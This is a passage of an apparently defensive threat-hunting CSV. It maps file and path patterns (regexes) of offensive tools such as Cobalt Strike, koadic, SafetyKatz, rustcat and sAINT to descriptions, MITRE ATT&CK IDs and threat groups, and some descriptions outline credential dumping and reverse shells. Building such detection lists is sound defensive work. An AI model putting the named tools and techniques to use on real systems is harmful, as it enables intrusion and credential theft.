is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/runcmd.lua*",".{0,1000}\/runcmd\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*/runcmd2.lua*",".{0,1000}\/runcmd2\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*/rundll32.cmd*",".{0,1000}\/rundll32\.cmd.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/rundll32_js*",".{0,1000}\/rundll32_js.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/RunOF/RunOF/*",".{0,1000}\/RunOF\/RunOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*/RunPEinMemory.exe*",".{0,1000}\/RunPEinMemory\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/RunPEinMemory64.exe*",".{0,1000}\/RunPEinMemory64\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/runshellcode.*",".{0,1000}\/runshellcode\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*/runswhide.lua*",".{0,1000}\/runswhide\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*/RuralBishop.git*",".{0,1000}\/RuralBishop\.git.{0,1000}","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","10","2","102","26","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" "*/rusers.nse*",".{0,1000}\/rusers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rustcat/releases/latest/download/*",".{0,1000}\/rustcat\/releases\/latest\/download\/.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*/rusthound.exe*",".{0,1000}\/rusthound\.exe.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","1","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*/RustHound.git*",".{0,1000}\/RustHound\.git.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","1","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*/RustRedOps.git*",".{0,1000}\/RustRedOps\.git.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/rvrsh3ll/*",".{0,1000}\/rvrsh3ll\/.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*/RWXfinder.git*",".{0,1000}\/RWXfinder\.git.{0,1000}","offensive_tool_keyword","rwxfinder","The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section","T1059.001 - T1059.003 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Discovery","https://github.com/pwnsauc3/RWXFinder","1","1","N/A","5","1","93","14","2023-07-15T15:42:55Z","2023-07-14T07:47:21Z" "*/S3cur3Th1sSh1t/*",".{0,1000}\/S3cur3Th1sSh1t\/.{0,1000}","offensive_tool_keyword","cobaltstrike","C# binary with embeded golang hack-browser-data","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","10","10","94","17","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z" "*/S3Scanner.git*",".{0,1000}\/S3Scanner\.git.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","1","N/A","8","10","2388","357","2024-04-19T12:43:19Z","2017-06-19T22:14:21Z" "*/S4UTomato.git*",".{0,1000}\/S4UTomato\.git.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","384","71","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*/s7-info.nse*",".{0,1000}\/s7\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/saefko.profile*",".{0,1000}\/saefko\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/Safer_PoC_CVE*",".{0,1000}\/Safer_PoC_CVE.{0,1000}","offensive_tool_keyword","POC","A Safer PoC for CVE-2022-22965 (Spring4Shell)","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/colincowie/Safer_PoC_CVE-2022-22965","1","1","N/A","N/A","1","45","7","2022-05-27T12:56:40Z","2022-03-31T16:58:56Z" "*/SafetyKatz.exe*",".{0,1000}\/SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SafetyKatz.git*",".{0,1000}\/SafetyKatz\.git.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1156","236","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" "*/sAINT.git*",".{0,1000}\/sAINT\.git.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*/sAINT-master.zip*",".{0,1000}\/sAINT\-master\.zip.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*/sam_dump_*.txt*",".{0,1000}\/sam_dump_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/samba-vuln-cve-2012-1182.nse*",".{0,1000}\/samba\-vuln\-cve\-2012\-1182\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/samdump.go*",".{0,1000}\/samdump\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*/samdump2*",".{0,1000}\/samdump2.{0,1000}","offensive_tool_keyword","samdump2","Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://salsa.debian.org/pkg-security-team/samdump2","1","0","N/A","10","6","N/A","N/A","N/A","N/A" "*/samruser.py*",".{0,1000}\/samruser\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/sandcat.git*",".{0,1000}\/sandcat\.git.{0,1000}","offensive_tool_keyword","sandcat","An open-source pentest oriented web browser","T1216 - T1590 - T1071","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/syhunt/sandcat","1","1","N/A","6","6","511","77","2023-12-21T18:40:27Z","2014-05-20T23:36:21Z" "*/sap_default.txt*",".{0,1000}\/sap_default\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/SauronEye.exe*",".{0,1000}\/SauronEye\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/sc_inject/inject/*",".{0,1000}\/sc_inject\/inject\/.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","286","33","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*/scan4all.exe*",".{0,1000}\/scan4all\.exe.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*/scan4all.git*",".{0,1000}\/scan4all\.git.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*/scan4all.git*",".{0,1000}\/scan4all\.git.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*/scan4all.rb*",".{0,1000}\/scan4all\.rb.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*/scan4all/lib/api*",".{0,1000}\/scan4all\/lib\/api.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*/scan4all/lib/util*",".{0,1000}\/scan4all\/lib\/util.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*/ScanInterception.ps1*",".{0,1000}\/ScanInterception\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/scanner/discovery*",".{0,1000}\/scanner\/discovery.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/scanner/kerberos*",".{0,1000}\/scanner\/kerberos.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/scanner/pcanywhere*",".{0,1000}\/scanner\/pcanywhere.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 